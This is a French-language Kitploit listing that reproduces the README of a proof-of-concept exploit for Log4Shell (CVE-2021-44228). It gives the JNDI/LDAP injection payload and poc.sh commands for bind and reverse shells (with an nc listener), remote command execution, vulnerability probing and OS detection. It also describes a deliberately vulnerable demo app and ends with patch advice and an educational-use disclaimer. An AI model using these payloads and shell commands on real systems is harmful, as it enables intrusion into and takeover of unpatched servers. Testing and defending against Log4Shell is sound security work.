Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2021-44228-PoC — Preuve de concept d'exploitation pour CVE-2021-44228 (Log4Shell) avec serveurs HTTP et LDAP, prenant en charge les shells inverses/liés, l'exécution de code à distance (RCE) et la détection basée sur le temps à des fins éducatives. | Kitploit
Outils/GitHubGitHub/thearqsz/cve-2021-44228-poc
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et Éducation
GitHubthearqsz/cve-2021-44228-poc

CVE-2021-44228-PoC

Preuve de concept d'exploitation pour CVE-2021-44228 (Log4Shell) avec serveurs HTTP et LDAP, prenant en charge les shells inverses/liés, l'exécution de code à distance (RCE) et la détection basée sur le temps à des fins éducatives.

Voir le dépôt
2il y a 4 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2021-44228 PoC

PoC pour CVE-2021-44228.

Projet réalisé UNIQUEMENT À DES FINS ÉDUCATIVES.

Serveur d'exploit

Ce projet crée deux serveurs : http et ldap. Les deux sont nécessaires au fonctionnement de l'exploit. Le fichier java spécifié est compilé et les serveurs sont démarrés dans le Dockerfile. Le payload est affiché à l'utilisateur - il doit être transmis à l'application vulnérable.

Exemple de payload :

root@kitploit:~
${jndi:ldap//127.0.0.1:1389/a}

Comment exécuter ?

  • Bind shell
root@kitploit:~
./poc.sh -i 127.0.0.1 -l 1234 -t 8080 -e bind --remote-port 4445
  • Reverse shell
root@kitploit:~
nc -lvnp 4444
./poc.sh -i 127.0.0.1 -l 1234 -t 8080 -e reverse --listener-port 4444
  • RCE
root@kitploit:~
./poc.sh -i 127.0.0.1 -l 1234 -t 8080 -e rce --cmd 'ls | tee log.txt'
  • Détection de vulnérabilité basée sur le temps
  • Il met le programme en pause pendant 25 secondes

    root@kitploit:~
    ./poc.sh -i 127.0.0.1 -l 1234 -t 8080 -e vulndetect
    
    • Détection du système d'exploitation
    root@kitploit:~
    nc -lvnp 4444
    ./poc.sh -i 127.0.0.1 -l 1234 -t 8080 -e osdetect --listener-port 4444
    

    La détection du système d'exploitation peut renvoyer 4 lettres :

    • L pour Linux
    • W pour Windows
    • M pour MacOS
    • U pour inconnu

    Contournement

    La technique de contournement a été publiée. Exemple ici

    Application vulnérable

    L'application a été conçue pour montrer comment cela fonctionne. Pour construire et exécuter le jar avec une application, utilisez :

    root@kitploit:~
    ./build_vuln_app.sh
    java -jar vulnapp/target/vulnapp.jar 'PAYLOAD'
    

    où PAYLOAD est renvoyé par le script ./poc.sh (par ex. ${jndi:ldap://127.0.0.1:1389/1}).

    Crédits

    Quelques crédits pour les projets et sites web qui ont été utilisés lors de la création de cet exploit :

    • https://github.com/shanfenglan/apache_log4j_poc
    • https://github.com/ivan-sincek/java-reverse-tcp
    • https://www.lunasec.io/docs/blog/log4j-zero-day/
    • https://github.com/RandomRobbieBF/marshalsec-jar

    Comment vous protéger ?

    Lancez l'application utilisant log4j avec log4j2.formatMsgNoLookups défini sur true, ou mettez à jour vers log4j-2.15.0-rc1 ou une version ultérieure. Des mises à jour sont disponibles dans la nature - appliquez-les dès que possible.

    Avis de non-responsabilité

    Ce projet ne peut être utilisé qu'à des fins éducatives. L'utilisation de ce logiciel contre des systèmes cibles sans autorisation préalable est illégale, et l'auteur ne sera pas responsable des dommages causés par une mauvaise utilisation de ce logiciel.

    Télécharger l’outil